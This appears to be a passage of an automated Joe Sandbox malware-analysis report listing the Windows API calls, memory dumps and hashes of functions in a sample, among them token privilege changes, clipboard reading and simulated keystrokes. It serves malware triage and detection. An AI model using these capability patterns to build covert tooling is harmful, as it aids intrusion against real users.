                                                                                        • Part of subcall function 00C15745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C1949C,?,00008000), ref: 00C15773
                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00C876DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 46ef1a713e75f8653bf1520e35607612681e28063bf4cdae82e19bc15fabfc17
                                                                                      • Instruction ID: a170216413f0b4c7f5f8b7f2c7c23ad9d6f850d90a72f89d2890db6403472786
                                                                                      • Opcode Fuzzy Hash: 46ef1a713e75f8653bf1520e35607612681e28063bf4cdae82e19bc15fabfc17
                                                                                      • Instruction Fuzzy Hash: 118194306087019FC715EF28C491AA9B7E1BF86314F14462DF8955B3A2EB30ED85EB56
                                                                                      Function 014E1BAC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 014E1BC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                      • Instruction ID: e6933d7ddcb23e0aefa2df8b0f23ca80a42ab79b3c28fdf567731667b99f93ef
                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                      • Instruction Fuzzy Hash: 04E0BF7498010DEFDB00EFA4D64D6EE7BB4EF04702F1005A5FD05D7691DB309E548A62
                                                                                      Function 00C16246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,00C524E0), ref: 00C16266
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: e275fbfbe8c3ca6db54fcce182c37b64520e26bbdfba5b8a4a2efa6d6b7261e1
                                                                                      • Instruction ID: 12b02be8196bc4f9d2f97764f6eb083f42468ece802bedf7b504809432bc2f78
                                                                                      • Opcode Fuzzy Hash: e275fbfbe8c3ca6db54fcce182c37b64520e26bbdfba5b8a4a2efa6d6b7261e1
                                                                                      • Instruction Fuzzy Hash: C5E09275400B01DEC7314F1AE804492FBE5FFE23613204A2ED0E592660D7B05986DB50
                                                                                      Function 014E1BB0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 014E1BC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction ID: b09c9d5cbfd548efd769620869849e5113e88ca66554316f687fa9c886058c6f
                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction Fuzzy Hash: 8BE0E67498010DDFDB00EFB4D64D6AE7FF4EF04702F100565FD01D2281D6309D508A62

                                                                                      Non-executed Functions

                                                                                      Function 00CA9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CA961A
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CA965B
                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CA969F
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CA96C9
                                                                                      • SendMessageW.USER32 ref: 00CA96F2
                                                                                      • GetKeyState.USER32(00000011), ref: 00CA978B
                                                                                      • GetKeyState.USER32(00000009), ref: 00CA9798
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CA97AE
                                                                                      • GetKeyState.USER32(00000010), ref: 00CA97B8
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CA97E9
                                                                                      • SendMessageW.USER32 ref: 00CA9810
                                                                                      • SendMessageW.USER32(?,00001030,?,00CA7E95), ref: 00CA9918
                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CA992E
                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CA9941
                                                                                      • SetCapture.USER32(?), ref: 00CA994A
                                                                                      • ClientToScreen.USER32(?,?), ref: 00CA99AF
                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CA99BC
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CA99D6
                                                                                      • ReleaseCapture.USER32 ref: 00CA99E1
                                                                                      • GetCursorPos.USER32(?), ref: 00CA9A19
                                                                                      • ScreenToClient.USER32(?,?), ref: 00CA9A26
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CA9A80
                                                                                      • SendMessageW.USER32 ref: 00CA9AAE
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CA9AEB
                                                                                      • SendMessageW.USER32 ref: 00CA9B1A
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CA9B3B
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CA9B4A
                                                                                      • GetCursorPos.USER32(?), ref: 00CA9B68
                                                                                      • ScreenToClient.USER32(?,?), ref: 00CA9B75
                                                                                      • GetParent.USER32(?), ref: 00CA9B93
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CA9BFA
                                                                                      • SendMessageW.USER32 ref: 00CA9C2B
                                                                                      • ClientToScreen.USER32(?,?), ref: 00CA9C84
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CA9CB4
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CA9CDE
                                                                                      • SendMessageW.USER32 ref: 00CA9D01
                                                                                      • ClientToScreen.USER32(?,?), ref: 00CA9D4E
                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CA9D82
                                                                                        • Part of subcall function 00C29944: GetWindowLongW.USER32(?,000000EB), ref: 00C29952
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA9E05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                      • String ID: @GUI_DRAGID$F
                                                                                      • API String ID: 3429851547-4164748364
                                                                                      • Opcode ID: 78010ba403b686facd859c1404158d54d43f71048d07a68ad78a7510da37ac93
                                                                                      • Instruction ID: d303cc1e76eb2ab5ab980daf74531a1f711105e4c26a8a7512629bc0a1a2a662
                                                                                      • Opcode Fuzzy Hash: 78010ba403b686facd859c1404158d54d43f71048d07a68ad78a7510da37ac93
                                                                                      • Instruction Fuzzy Hash: 8842AE34604642AFDB24CF24CC85BAABBF5FF4A328F140619FA69872A1D731D960DF51
                                                                                      Function 00CA4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00CA48F3
                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00CA4908
                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00CA4927
                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00CA494B
                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00CA495C
                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00CA497B
                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00CA49AE
                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00CA49D4
                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00CA4A0F
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CA4A56
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CA4A7E
                                                                                      • IsMenu.USER32(?), ref: 00CA4A97
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA4AF2
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA4B20
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA4B94
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00CA4BE3
                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00CA4C82
                                                                                      • wsprintfW.USER32 ref: 00CA4CAE
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CA4CC9
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CA4CF1
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CA4D13
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CA4D33
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CA4D5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                      • String ID: %d/%02d/%02d
                                                                                      • API String ID: 4054740463-328681919
                                                                                      • Opcode ID: e5081494b478c0827bfc7c1d334316d3df9566b2b4a82dbd282cd8dcdb4f4f73
                                                                                      • Instruction ID: e9447693c7b19b627af0f9c804cd16e079563ffe6c411d6af2d604d0cd925304
                                                                                      • Opcode Fuzzy Hash: e5081494b478c0827bfc7c1d334316d3df9566b2b4a82dbd282cd8dcdb4f4f73
                                                                                      • Instruction Fuzzy Hash: E4121631500215AFEB298F64DC49FAE7BF8EF86318F104129F525EB1E1DBB49A41CB50
                                                                                      Function 00C2F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C2F998
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C6F474
                                                                                      • IsIconic.USER32(00000000), ref: 00C6F47D
                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00C6F48A
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6F494
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C6F4AA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C6F4B1
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C6F4BD
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C6F4CE
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C6F4D6
                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C6F4DE
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6F4E1
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F4F6
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F501
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F50B
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F510
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F519
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F51E
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F528
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F52D
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6F530
                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C6F557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 4125248594-2988720461
                                                                                      • Opcode ID: e35c545211c605e56ddc1407cd67be39b372d3167805377b7615c36675da43b9
                                                                                      • Instruction ID: 923f81d4c0974491dce129f99dc01ca37a52a3ed33cf28bcc7bc4a06abf24b69
                                                                                      • Opcode Fuzzy Hash: e35c545211c605e56ddc1407cd67be39b372d3167805377b7615c36675da43b9
                                                                                      • Instruction Fuzzy Hash: 5F313271A40218BFEB316BB55C8AFBF7E7CEB45B54F100069FA01E71D1CAB15D11AA60
                                                                                      Function 00C71201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7170D
                                                                                        • Part of subcall function 00C716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7173A
                                                                                        • Part of subcall function 00C716C3: GetLastError.KERNEL32 ref: 00C7174A
                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C71286
                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C712A8
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C712B9
                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C712D1
                                                                                      • GetProcessWindowStation.USER32 ref: 00C712EA
                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00C712F4
                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C71310
                                                                                        • Part of subcall function 00C710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C711FC), ref: 00C710D4
                                                                                        • Part of subcall function 00C710BF: CloseHandle.KERNEL32(?,?,00C711FC), ref: 00C710E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                      • String ID: $default$winsta0
                                                                                      • API String ID: 22674027-1027155976
                                                                                      • Opcode ID: 313846b75139a8f9d9ce85edeb0e2fc6e5de9e1ea6b1bb5bd4f4fd0b7183aa43
                                                                                      • Instruction ID: b830dcd230acb9578e5415b3137293b6edf47fa91ccd28ca38c50db1c3b290b1
                                                                                      • Opcode Fuzzy Hash: 313846b75139a8f9d9ce85edeb0e2fc6e5de9e1ea6b1bb5bd4f4fd0b7183aa43
                                                                                      • Instruction Fuzzy Hash: 5881A171900209AFDF219FA9DC49FEE7BB9EF05704F188129FD28E61A0D7348A44CB60
                                                                                      Function 00C70B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71114
                                                                                        • Part of subcall function 00C710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71120
                                                                                        • Part of subcall function 00C710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C7112F
                                                                                        • Part of subcall function 00C710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71136
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C7114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C70BCC
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C70C00
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70C17
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C70C51
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C70C6D
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70C84
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C70C8C
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C70C93
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C70CB4
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00C70CBB
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C70CEA
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C70D0C
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C70D1E
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70D45
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D4C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70D55
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D5C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70D65
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D6C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C70D78
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D7F
                                                                                        • Part of subcall function 00C71193: GetProcessHeap.KERNEL32(00000008,00C70BB1,?,00000000,?,00C70BB1,?), ref: 00C711A1
                                                                                        • Part of subcall function 00C71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C70BB1,?), ref: 00C711A8
                                                                                        • Part of subcall function 00C71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C70BB1,?), ref: 00C711B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: 32623099828cf343ad759f6529ff5581a51bbaa13d6ad15ad31d3a161c0c6b35
                                                                                      • Instruction ID: 9b3526b69e50e148c8fc96943df08977017a289bd129e5063c991da881bc2f0f
                                                                                      • Opcode Fuzzy Hash: 32623099828cf343ad759f6529ff5581a51bbaa13d6ad15ad31d3a161c0c6b35
                                                                                      • Instruction Fuzzy Hash: 3F716D71A0020AEBDF10DFA5DC84FEEBBB8BF15304F148519F929A7291D771AA05CB60
                                                                                      Function 00C8EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenClipboard.USER32(00CACC08), ref: 00C8EB29
                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C8EB37
                                                                                      • GetClipboardData.USER32(0000000D), ref: 00C8EB43
                                                                                      • CloseClipboard.USER32 ref: 00C8EB4F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C8EB87
                                                                                      • CloseClipboard.USER32 ref: 00C8EB91
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C8EBBC
                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00C8EBC9
                                                                                      • GetClipboardData.USER32(00000001), ref: 00C8EBD1
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C8EBE2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C8EC22
                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C8EC38
                                                                                      • GetClipboardData.USER32(0000000F), ref: 00C8EC44
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C8EC55
                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C8EC77
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8EC94
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8ECD2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C8ECF3
                                                                                      • CountClipboardFormats.USER32 ref: 00C8ED14
                                                                                      • CloseClipboard.USER32 ref: 00C8ED59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                      • String ID:
                                                                                      • API String ID: 420908878-0
                                                                                      • Opcode ID: ab582d547fa1a0e494a7cf840864fb9bd43abfa697df63c013885e150f8d67ac
                                                                                      • Instruction ID: b3054bbf44e5fb664a5d2af0fd31b6c5089bafd1c599c9345f04ff831cb53158
                                                                                      • Opcode Fuzzy Hash: ab582d547fa1a0e494a7cf840864fb9bd43abfa697df63c013885e150f8d67ac
                                                                                      • Instruction Fuzzy Hash: 8861BF342042019FD300EF24D895F7EB7E4EF86718F144519F466972A2DB31EE4ADBA6
                                                                                      Function 00C8698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C869BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C86A12
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C86A4E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C86A75
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C86AB2
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C86ADF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
